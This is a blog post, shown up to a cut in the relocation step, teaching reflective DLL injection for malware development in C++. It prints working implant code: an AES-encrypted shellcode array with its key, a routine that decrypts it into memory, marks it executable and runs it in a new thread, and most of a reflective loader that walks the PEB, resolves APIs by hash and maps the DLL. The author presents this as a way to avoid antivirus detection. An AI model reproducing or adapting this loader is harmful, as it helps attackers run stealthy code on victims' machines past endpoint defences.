Reflective DLL Injection in C++

Posted by Brendan Ortiz on October 31, 2021

Dllinjeciton

TL;DR

Implant with our encrypted DLL -> allocates memory for the DLL -> put the decrypted DLL into that memory space -> find the offset of the exported ReflectiveLoader function in the DLL -> call the ReflectiveLoader function -> ReflectiveLoader searches backward for the start of the DLL in memory -> allocates a new memory region that is the size of the DLL Image in memory (which is larger than on disk) -> perform loading and patching operations -> call DllMain of the DLL now that it's been loaded -> DllMain calls our Go function -> go function decrypts our calc.exe payload and executes it!

Intro

I am currently learning more about malware development. In this endeavor, I’ve learned that C++ appears to be the go-to standard for most malware development scenarios. There’s a lot of benefits for writing malware in C++ such as direct usage of windows APIs. In languages such as C#, you need to use something called Platform Invoke or PInvoke for short when you want to use certain Windows APIs since they’re not native to the language. Learning malware development in C++ took me down the road of reflective DLL injection, which is much more difficult than it sounds.

According to Stephen Fewer, “Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.” 

This means that the library has minimal interaction with the host system. This means a self-developed PE (Portal Executable) file loader is responsible for loading the library in the target process’ memory in the correct format for execution. This is not a trivial task and requires pretty extensive knowledge of the PE file format and how the loading process occurs.

Performing this task, however, is extremely beneficial. A library that loads itself is not registered in any way with the host system and as a result, is largely undetectable at both a system and process level. However next-generation AV and EDR solutions with visibility in process memory and API hooks will likely still cause issues.

The goal of this blog post is for me to solidify my knowledge in Reflective DLL injection through the process of teaching others. Why Reflective DLL Injection specifically? Great question! This overarching subject includes a multitude of smaller topics that appear to be the cornerstones of more advanced malware development subjects, such as evasive techniques.

Code

The entire code base for the Reflective Loader can be found in my GitHub. You can use this code to follow along as well as the code snippets provided during this blog post.

Reflective DLL Injection Source Review

To kick off this source code review we'll start with DllMain.cpp of the library we want to reflectively load into our process. This code is created by reenz0h.

#include "ReflectiveLoader.h"
#include <windows.h>
#include <wincrypt.h>
#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "advapi32")
#include <psapi.h>
</psapi.h></wincrypt.h></windows.h>


First, we start with some standard imports. The important thing to note is the "ReflectiveLoader.h" include statement. This is part of the code that will handle loading our DLL in memory.

Next, we have our AESDecrypt function that will handle performing decryption of the DLL once we put it in our implant payload. I won't cover this code section because it is not related to reflective DLL injection in any way. This is simply a means of obfuscating our payload when we put it in our implant so when the implant is saved to disk it can't be read and trigger any anti-virus mechanism.

Then we have our payload and key variables.

// calc shellcode (exitThread) - 64-bit
unsigned char payload[] = { 0x7, 0x26, 0xd8, 0x8e, 0xb8, 0x78, 0xf9, 0x78, 0x84, 0x3c, 0x0, 0xa8, 0x5b, 0xa, 0x6a, 0xe2, 0xc9, 0x6d, 0x63, 0x8b, 0x87, 0x9e, 0x80, 0xb5, 0x16, 0xc5, 0xa5, 0xc7, 0xda, 0x44, 0x1d, 0x2d, 0xae, 0x48, 0x2c, 0xb1, 0xc8, 0x92, 0xf5, 0xbc, 0xf5, 0xb8, 0xe6, 0xda, 0x9, 0x3c, 0x85, 0x9e, 0xac, 0xfa, 0x4c, 0xce, 0xa4, 0x35, 0x0, 0xdc, 0x50, 0x6b, 0x36, 0xb7, 0x5c, 0xfb, 0x12, 0xf1, 0x52, 0x46, 0x5b, 0x15, 0x3, 0x7d, 0x7b, 0x4e, 0x8d, 0x71, 0xf5, 0x7c, 0x43, 0x87, 0x46, 0x54, 0x64, 0xf9, 0x75, 0xab, 0x65, 0xb0, 0xbf, 0x9b, 0xc3, 0xd2, 0x3a, 0x73, 0xfc, 0xe3, 0x35, 0xe1, 0x23, 0x5d, 0x29, 0xe5, 0x10, 0xe2, 0x72, 0xef, 0xa9, 0x25, 0xa, 0x5a, 0x1f, 0x8e, 0xf7, 0xa5, 0xd8, 0x8b, 0x16, 0x33, 0xcf, 0x91, 0xde, 0x17, 0x79, 0x6, 0x5f, 0xd9, 0x61, 0x2c, 0x6a, 0x90, 0x7a, 0xaf, 0xb3, 0xdd, 0x1e, 0x0, 0xe3, 0xf3, 0x70, 0x5, 0x7a, 0x6d, 0x42, 0x7f, 0xb2, 0xc, 0xe0, 0xa2, 0xce, 0x3b, 0x1f, 0xa3, 0xf5, 0xcf, 0xa9, 0x1f, 0x3a, 0xf7, 0xab, 0x3, 0xf3, 0x36, 0xf2, 0x86, 0xf4, 0x4f, 0x20, 0x4a, 0xaa, 0x6a, 0x1c, 0xae, 0xe0, 0x13, 0x29, 0xe3, 0xb7, 0x84, 0xd8, 0x9b, 0xbc, 0x2f, 0xa6, 0xb2, 0x5f, 0xdc, 0x3b, 0x1, 0x70, 0x16, 0x61, 0x4c, 0xee, 0x42, 0x69, 0xf6, 0x1, 0x87, 0x76, 0x2f, 0x84, 0x14, 0x38, 0xd3, 0xa6, 0xe0, 0x25, 0x57, 0xa0, 0x7e, 0x4c, 0x1c, 0x6, 0xf, 0xae, 0x29, 0x92, 0x10, 0x3f, 0x5a, 0xff, 0x1d, 0x57, 0x67, 0x18, 0xba, 0x67, 0xb1, 0x7d, 0x9a, 0x6f, 0x48, 0xa3, 0x23, 0x23, 0x12, 0x62, 0xe3, 0x8b, 0xfb, 0x3e, 0x63, 0x9, 0xd0, 0x1d, 0xf8, 0xb0, 0xf6, 0x9c, 0x94, 0xd4, 0xb3, 0x2b, 0xfe, 0xe, 0xbb, 0x98, 0x65, 0xcf, 0x29, 0x39, 0xf8, 0x74, 0x3b, 0x9d, 0x24, 0xc2, 0xc, 0xa4, 0xdf, 0x7e, 0x4, 0xfd, 0xf9, 0x11, 0xc5, 0x36, 0xc6, 0xb5, 0x27, 0xd, 0x16, 0xa9, 0xe, 0xe3, 0x9, 0x65, 0xfb, 0xa5, 0xa3 };
unsigned char key[] = { 0xaf, 0x86, 0x80, 0xd4, 0x5e, 0xa3, 0xae, 0x79, 0xa9, 0x92, 0x38, 0xbe, 0x79, 0x8a, 0x9c, 0x41 };


These are important. This is the final payload that will be executed by the library we are reflectively loading into our process. All that is important is the fact that the payload is encrypted and will be decrypted by the decryption function using the key provided. The intended functionality is to pop a calc.exe payload.

Next, we have our Go function. This is the function that will be creating the memory space, setting the protections, and creating the execution thread for our calc.exe payload.

void Go(void) {
    void* exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;
    unsigned int payload_len = sizeof(payload);
    // Allocate memory for payload
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // Decrypt payload
    AESDecrypt((char*)payload, payload_len, (char*)key, sizeof(key));
    // Copy payload to allocated buffer
    RtlMoveMemory(exec_mem, payload, payload_len);
    // Make the buffer executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
    // If all good, launch the payload
    if (rv != 0) {
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
        WaitForSingleObject(th, -1);
    }
}


It starts by initializing some variables, then we take the size of our calc payload, and create a memory region in our current process using VirtualAlloc that is equal to the size of our payload. Next, the payload is decrypted using the key variable and the AESDecrypt function. We follow that up by moving the payload into the memory region we had created using the VirtualAlloc and the pointer to the memory region "exec_mem". Next, we change the protections of our memory region from readable and writable to readable and executable. Finally, we create an execution thread in our process using CreateThread and the pointer to the memory region. All standard process injection techniques.

Finally, our DllMain function calls Go using the CreateThread function once the DLL is loaded and attached to our process.

extern "C" HINSTANCE hAppInstance;
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    BOOL bReturnValue = TRUE;
    switch (dwReason)
    {
    case DLL_QUERY_HMODULE:
        if (lpReserved != NULL)
            *(HMODULE*)lpReserved = hAppInstance;
        break;
    case DLL_PROCESS_ATTACH:
        hAppInstance = hinstDLL;
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Go, 0, 0, 0);
        break;
    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return bReturnValue;
}


Everything covered up to this point is standard process injection techniques. However, our reflective loader is going to be a bit more difficult to tackle and explain.

I am not going over the header files because they're pretty standard. The important thing you need to know is that in reflectiveLoader.h we create variables that will eventually be our functions for LoadLibraryA, GetProcAddress, VirutalAlloc, and NTFlushInstructionCache, which will all be used later in the codebase. The rest of the variables, structures, and definitions in this header file are necessary components to reach and save points to the functions mentioned above. This is a simplification however, the purpose of this blog post is to teach about reflective loading, not PEB data structures and API hashing.

Next up we have the ReflectiveDLLInjection.h file. This file contains some definition logic that will set the function pointer of our loader to the necessary size for our architecture. Then we create two function definitions, the first being our ReflectiveLoader function, and our DllMain function. 

Finally, we get to the most important piece of our RefleciveLoader DLL, the ReflectiveLoader.c file. This file contains code from Stephen Fewer that is used to Reflectively load a DLL into our process from memory. This process involves parsing the PE Headers and formatting the executable in such a way that it is readable and executable in our process. After we are done explaining how our ReflectiveLoader function works, I will explain how it is called from our final implant.

#include "ReflectiveLoader.h"
HINSTANCE hAppInstance = NULL;
#define REFLDR_NAME ReflectiveLoader
#pragma intrinsic( _ReturnAddress )
__declspec(noinline) ULONG_PTR caller(VOID) { return (ULONG_PTR)_ReturnAddress(); }
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT ULONG_PTR WINAPI REFLDR_NAME(LPVOID lpParameter)
#else
DLLEXPORT ULONG_PTR WINAPI REFLDR_NAME(VOID)
#endif


We start by creating some function definitions and a definition for REFLDR_NAME as "ReflectiveLoader". There's nothing too exciting in this code segment aside from our caller function which returns the address of the instruction just after we call "caller." The way this works is the following:

Address     Instruction     stack before call | stack after call
0x10        call caller()           aaab                0x11
0x11        next instruction                            aaab


When we call the function caller, we push the next instruction onto the stack as the address we will return to when we exit the “caller” function. However, "caller" returns this address when it is called so it can be stored and used for later use. Following that, we create a definition for our ReflectiveLoader function based on:

REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR


If this variable is set then our definition for ReflectiveLoader function accepts parameters, otherwise, it does not.

Next, we dive into the actual ReflectiveLoader function itself:

{
    LOADLIBRARYA pLoadLibraryA = NULL;
    GETPROCADDRESS pGetProcAddress = NULL;
    VIRTUALALLOC pVirtualAlloc = NULL;
    NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
    USHORT usCounter;
    ULONG_PTR uiLibraryAddress;
    ULONG_PTR uiBaseAddress;
    ULONG_PTR uiAddressArray;
    ULONG_PTR uiNameArray;
    ULONG_PTR uiExportDir;
    ULONG_PTR uiNameOrdinals;
    DWORD dwHashValue;
    ULONG_PTR uiHeaderValue;
    ULONG_PTR uiValueA;
    ULONG_PTR uiValueB;
    ULONG_PTR uiValueC;
    ULONG_PTR uiValueD;
    ULONG_PTR uiValueE;
    uiLibraryAddress = caller();


First, we create null pointers to our functions that we defined in ReflectiveLoader.h. Followed by some variables that are necessary for parsing the PE headers of the library we're attempting to load. Finally, we call our "caller" function which will return to us the address of the next instruction which is saved in the uiLibraryAddress variable. (Just know that this is not the actual library address, we're using this as a starting point) Since our ReflectiveLoader function is a function that is exported by our DLL, we know that this address is inside of the library we are trying to load, therefore we can search backward from our starting address inside ReflectiveLoader until we find the magic bytes that indicate we are at the beginning of a PE file. This is done in the following while loop:

while (TRUE)
    {
        if (((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE)
        {
            uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
            if (uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024)
            {
                uiHeaderValue += uiLibraryAddress;
                if (((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE)
                    break;
            }
        }
        uiLibraryAddress--;
    }


First, we typecast our current address as a pointer to a DOS Header structure. If were at the correct address, then performing this typecast will fill the structure with the necessary values. When we extract the e_magic variable from our IMAGE_DOS_HEADER structure, we are extracting the "MZ" values which equate to 5A4D in hex. If we look at the WINNT.h file that is included in the GitHub directory we can see the IMAGE_DOS_HEADER definition equates to 0x5A4D or "MZ".


If our current address does not equal the magic bytes "MZ" then we subtract our current address by one and rerun the check. Once the address of uiLibraryAddress holds MZ we set the variable of uiHeaderValue equal to the offset of the NTHeaders. The NTHeaders offset is pointed to by the e_lfanew variable held within the PIMAGE_DOS_HEADER structure. If that offset passes a simple check, then we add the base address of the library, uiLibraryAddress, to the offset. This gives us the location of the NTHeaders. Finally, we check if the value of the Signature variable stored in the PIMAGE_NT_HEADERS structure is equal to the definition IMAGE_NT_SIGNATURE.


When we leave our loop, we have the base address of our DLL and the address of the NTHeaders structure. This next code chunk checks if the library is compiled for a 64-bit, 32-bit, or ARM system. We will return a pointer to the PEB based on our system architecture.

#ifdef WIN_X64
    uiBaseAddress = __readgsqword(0x60);
#else
#ifdef WIN_X86
    uiBaseAddress = __readfsdword(0x30);
#else WIN_ARM
//    uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
#endif
#endif


Our next chunk of code is pretty complex, so please bear with me while I explain it.

    // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
    uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
    // get the first entry of the InMemoryOrder module list
    uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
    while (uiValueA)
    {
        // get pointer to current modules name (unicode string)
        uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
        // set bCounter to the length for the loop
        usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
        // clear uiValueC which will store the hash of the module name
        uiValueC = 0;
        // compute the hash of the module name...


First, we typecast our PEB pointer to a _PPEB type and set the value of pLdr, which is the PEB Loader Data, in the _PPEB structure to our uiBaseAddress variable. PEB Loader Data is simply information on all the modules currently loaded into the process. Next, we obtain a pointer to the first link in the module doubly linked list in the PEB. This is accomplished by typecasting our uiBaseAddress variable to the PPEB_LDR_DATA type and accessing the InMemoryOrderModuleList.Flink variable. The value returned is set to uiValueA. Next, we enter a loop that will continue while uiValueA is equal to the address of a module. If uiValueA becomes NULL or invalid there are no more modules to parse and we exit our loop. Next, we obtain a pointer to the first module's name, by again typecasting our pointer to the appropriate type and accessing the BaseDLLName.pBuffer variable and setting it to uiValueB. Then we create a counter variable named usCounter and set it equal to the length of our module name. Finally, we zero out the uiValueC variable which will contain our modules' hash value for comparison. The hash values for each module we need to access are stored in our ReflectiveLoader.h header file.

In case you're wondering what the Process Environment Blocks' InMemoryORderModuleList looks like refer to the image below:


The next code segment will bring us into a do-while loop that will hash the current modules' names.

do
        {
            uiValueC = ror((DWORD)uiValueC);
            // normalize to uppercase if the madule name is in lowercase
            if (*((BYTE*)uiValueB) >= 'a')
                uiValueC += *((BYTE*)uiValueB) - 0x20;
            else
                uiValueC += *((BYTE*)uiValueB);
            uiValueB++;
        } while (--usCounter);


When we exit our loop, we will have a completed hash of the modules' name stored in uiValueC. This value will be checked in two different IF statements that will determine our actions from the next point onward.

        if ((DWORD)uiValueC == KERNEL32DLL_HASH)
        {
                    //FIRST EXECUTION BRANCH
        }
        else if ((DWORD)uiValueC == NTDLLDLL_HASH)
        {
                    //SECOND EXECUTION BRANCH
        }
        // we stop searching when we have found everything we need.
        if (pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache)
            break;
        // get the next entry
        uiValueA = DEREF(uiValueA);


If our uiValueC hash is equal to the KERNEL32DLL_HASH definition stored in ReflectiveLoader.h we enter the first branch, otherwise, if it's equal to the NTDLLDLL_HASH we enter the second execution branch. When we're done with both execution branches, we always check to see if we have pointers to the functions LoadLibraryA, GetProcAddress, VirtualAlloc, NtFlushIntstructionCache. If any of those pointers are NULL, then we continue to the next module using the DEREF function and our pointer to the first module. This process is repeated until we find all four needed functions.

With the execution flow out of the way let's enter each branch to see how the code written obtains us the pointers to each function we need.

            // get this modules base address
            uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
            // get the VA of the modules NT Header
            uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
            // uiNameArray = the address of the modules export directory entry
            uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
            // get the VA of the export directory
            uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
            // get the VA for the array of name pointers
            uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames);
            // get the VA for the array of name ordinals
            uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals);
            usCounter = 3;
            // loop while we still have imports to find
            while (usCounter > 0)


First, to enter this block we must obtain the module equal to KERNEL32.DLL, next we obtain a pointer to the base address of the KERNEL32.DLL module as it is loaded in our process' memory. This is done using our module pointer uiValueA typecasting it to PLDR_DATA_TABLE_ENTRY and accessing the DLLBase variable. We save that value into the uiBaseAddress variable for later use (this part of the code should look familiar as we did it previously to obtain the handle to our DLL we are attempting to load into memory). Next, we obtain a pointer to the NTHeaders by adding the base address to the offset stored in the e_lfanew variable. Following that we obtain a handle to the export directory through the NTHeaders' optional header, then the optional headers' data directory table, and the data directory tables' export directory value.


Next, we get the virtual address of the export directory and add the base address of the module to it to get the actual address of the export directory in our current process' memory for the KERNEL32 module. Next, we obtain two pointers using our export directories' actual address, the first is the pointer to the address of the Names array and the second is the pointer to the address of the name ordinals array.


Then we set a counter variable, usCounter, to three representing the number of functions we need to find in the Kernel32.dll module. Then we enter a loop that will count down until we've found all our desired function pointers.

            while (usCounter > 0)
            {
                // compute the hash values for this function name
                dwHashValue = hash((char*)(uiBaseAddress + DEREF_32(uiNameArray)));
                // if we have found a function we want we get its virtual address
                if (dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH)
                {
                    // get the VA for the array of addresses
                    uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
                    // use this functions name ordinal as an index into the array of name pointers
                    uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
                    // store this functions VA
                    if (dwHashValue == LOADLIBRARYA_HASH)
                        pLoadLibraryA = (LOADLIBRARYA)(uiBaseAddress + DEREF_32(uiAddressArray));
                    else if (dwHashValue == GETPROCADDRESS_HASH)
                        pGetProcAddress = (GETPROCADDRESS)(uiBaseAddress + DEREF_32(uiAddressArray));
                    else if (dwHashValue == VIRTUALALLOC_HASH)
                        pVirtualAlloc = (VIRTUALALLOC)(uiBaseAddress + DEREF_32(uiAddressArray));
                    // decrement our counter
                    usCounter--;
                }
                // get the next exported function name
                uiNameArray += sizeof(DWORD);
                // get the next exported function name ordinal
                uiNameOrdinals += sizeof(WORD);
            }


We start by hashing the name of the first function exported in the KERNEL32.dll library by accessing our uiNameArray variable. Next, if the hash is equal to any of the functions, we're looking for we enter the execution block. In the execution block, we obtain a pointer to the array of addresses, which is named the "AddressOfFunctions" in the previous PEBear screenshot. We then increment our place into the address array by 4 bytes * whatever place we're in currently. Our current place is measured by each Ordinal of the function that is being imported or exported from their respective library. If you're wondering what that looks like refer to the following screenshot:


As you can see from the screenshot above, we have the array of ordinals in hex bytes in the disassembly, starting from 0 to however many functions we're importing or exporting. We multiply our place by 4 bytes because the array of addresses holds 4 bytes for each function’s relative virtual address. You can see what that looks like in the following screenshot:


Therefore, we obtain the correct function RVA using the base address of the export directories' array of addresses and then increment to whatever function we want to be at using the ordinal place * 4 bytes. Then we simply perform a check against whatever function hash we obtained and then save a function pointer address to the respective definitions in ReflectiveLoader.h. We then decrement our counter variable since we only need 2 more functions to find. Finally, we increment our ordinal place and the place of our name array to get the name of the next function. This process is repeated until all functions are found. I won't bother explaining the ‘else if’ block for NTDLL.DLL because it goes through the same process, we just substitute our target library module and function.

Now comes the interesting part, once we've found all the required functions, we can begin to load our malicious DLL into the memory space of our current process. Earlier we discovered the base address of our malicious DLL by decrementing byte by byte from the "caller" return function address. We then use the base address of the DLL and the e_lfanew value to obtain the address of the NTHeaders for the DLL.

uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;


We then allocate memory in our current process space using the optional headers' SizeOfImage value stored within the NTHeader.


uiBaseAddress = (ULONG_PTR)pVirtualAlloc(NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);


We store a pointer to the allocated memory in a variable named uiBaseAddress. Next, we store the size of the Dos Headers, NT Headers, and Optional Headers into the uiValueA variable. We follow that by storing our base address for the decrypted DLL payload into uiValueB. Finally, the base address for our allocated memory in uiValueC.

    // we must now copy over the headers
    uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
    uiValueB = uiLibraryAddress;
    uiValueC = uiBaseAddress;
    while (uiValueA--)
        *(BYTE*)uiValueC++ = *(BYTE*)uiValueB++;


Next, we loop through both the allocated memory and the base address of our library byte by byte and copy the headers into the allocated memory space. We stop once uiValueA (Size of the Headers) becomes zero. The header values are static whether it's saved on disk or in memory because the header values act as an index for the executable. We will follow that up by obtaining handles to each of the sections and copying them over into our allocated memory region 1 section at a time.

    uiValueA = ((ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader);
    // itterate through all sections, loading them into memory.
    uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
    while (uiValueE--)
    {
        // uiValueB is the VA for this section
        uiValueB = (uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress);
        // uiValueC if the VA for this sections data
        uiValueC = (uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData);
        // copy the section over
        uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
        while (uiValueD--)
            *(BYTE*)uiValueB++ = *(BYTE*)uiValueC++;
        // get the VA of the next section
        uiValueA += sizeof(IMAGE_SECTION_HEADER);
    }


We start by jumping to the end of the OptionalHeader section to retrieve a handle to the Section Headers and store it in uiValueA. After we obtain the number of sections from the File Header and store it in uiValueE. The uiValueE variable will be our counter for our loop. We obtain the starting address for the section in the allocated memory region by taking the base address of the allocated region "uiBaseAddress" and adding the virtual address for that section. We then obtain a handle of the actual data stored in the library by taking the address of our DLL handle and adding the raw data address that is used when the DLL is stored on disk. The section header looks like the following when parsed by PEBear: 


On the far left, you have the section name and next to that you have the raw address for the data in that section. When the library is loaded into memory, the virtual address is used, and the data is copied over to the allocated memory region’s base address + the virtual address. When we're done copying the data for our first section, we increment to the next section in our section header and repeat the process until all sections have been successfully copied into the allocated memory region.

Now that we have our sections into memory, we need to process our DLL's import address table and fix the addresses to reflect their places in memory for our current process. This is where the pointers to GetProcAddress and LoadLibraryA will come into play.

    // STEP 4: process our images import table...
    // uiValueB = the address of the import directory
    uiValueB = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    // we assume their is an import table to process
    // uiValueC is the first entry in the import table
    uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress);
    // itterate through all imports
    while (((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)


The first step is to obtain a pointer to the address of the import directory, which is stored in uiValueB. We then obtain a pointer to the first import table entry using the base address of our allocated memory and adding the virtual address of the import directory + the first virtual address, this value is then stored in uiValueC. We then enter a loop that will continue if our import directory has a module name value.

// use LoadLibraryA to load the imported module into memory
        uiLibraryAddress = (ULONG_PTR)pLoadLibraryA((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
        // uiValueD = VA of the OriginalFirstThunk
        uiValueD = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk);
        // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
        uiValueA = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk);
        // itterate through all imported functions, importing by ordinal if no name present
        while (DEREF(uiValueA))


After entering the loop, we load the desired module into memory using the pointer to LoadLibraryA we obtained earlier and save the address it's loaded at into uiLibraryAddress. We then obtain the address to the "OriginalFirstThunk" and store it in uiValueD. uiValueD now holds the location in memory that is an array of "Thunks" for each function. The easiest way to think of Thunks is RVA's that can be used to call the functions. We obtain the Thunk for the first function we need to import and store it in uiValueA. 


The PEBear screenshot above shows the first entry of the import directory, Kernel32.dll. The OriginalFirstThunk RVA holds all the Thunk RVAs. The FirstThunk points to the address of the "OriginalThunk" of the CreateThread function. Every 8 bytes will contain an "OriginalThunk" that will be associated with each function. To enter the loop, we dereference the value of uiValueA, which contains the firstThunk for CreateThread. If this value is NULL, we exit the loop.

            // sanity check uiValueD as some compilers only import by FirstThunk
            if (uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG)
            {
                // get the VA of the modules NT Header
                uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
                // uiNameArray = the address of the modules export directory entry
                uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
                // get the VA of the export directory
                uiExportDir = (uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
                // get the VA for the array of addresses
                uiAddressArray = (uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
                // use the import ordinal (- export ordinal base) as an index into the array of addresses
                uiAddressArray += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal) - ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->Base) * sizeof(DWORD));
                // patch in the address for this imported function
                DEREF(uiValueA) = (uiLibraryAddress + DEREF_32(uiAddressArray));
            }
            else
            {
                // get the VA of this functions import by name struct
                uiValueB = (uiBaseAddress + DEREF(uiValueA));
                // use GetProcAddress and patch in the address for this imported function
                DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress((HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
            }
            // get the next imported function
            uiValueA += sizeof(ULONG_PTR);
            if (uiValueD)
                uiValueD += sizeof(ULONG_PTR);
        }
        // get the next import
        uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR);
    }


First, we do a sanity check for the IMAGE_ORDINAL_FLAG and the Ordinal being set for the function we are trying to import. If it is set, then we must import the function by Ordinal, rather than by name. Luckily for us, we will not enter this execution block because our DLL does not import any functions that need to be imported by Ordinal. Because of this, I will not explain the execution of that block. However, I encourage you to check it out yourself.

Since we are not entering the import by ordinal block, we enter our else block which will obtain the address of the name of the function by taking the base address of the allocated memory and adding the address of the "OriginalThunk" of the function. The "OriginalThunk" RVA will contain the address name of the function we are trying to import. If you recall, the uiValueA variable contains the value of our FirstThunk, the "FirstThunk" is the RVA of "Thunk Array" for all the functions we need to import. The "OriginalThunk" associated with that function will point to that functions' name in memory. We can then use that name in combination with our pointer to getProcAddress to obtain a pointer to the desired function which is then stored in the "FirstThunk" address that uiValueA points to. Then, when we call that function, instead of us using 0x0000000000003BA8, we'll use whatever is returned by GetProcAddress. This means the first address has been successfully patched!


The process of finding the OriginalThunk (Function Name) of the imported function, and then patching the value pointed to by the "Call Via" column, is repeated until all imported functions are patched for that library module. Then the process is repeated for the next library module.

When all the function imports have been patched, we continue to process the image relocation tables. Side note, in the code there is an if statement that will be executed if the architecture is ARM, I will skip over this code because I am on an intel machine.

    // STEP 5: process all of our images relocations...
    // calculate the base address delta and perform relocations (even if we load at desired image base)
    uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
    // uiValueB = the address of the relocation directory
    uiValueB = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    // check if their are any relocations present
    if (((PIMAGE_DATA_DIRECTORY)uiValueB)->Size)
    {
        // uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
        uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress);
        // and we itterate through all entries...
        while (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock)
        {
            // uiValueA = the VA for this relocation block
            uiValueA = (uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress);
            // uiValueB = number of entries in this relocation block
            uiValueB = (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC);
            // uiValueD is now the first entry in the current relocation block
            uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
            // we itterate through all the entries in the current block...
            while (uiValueB--)
            {
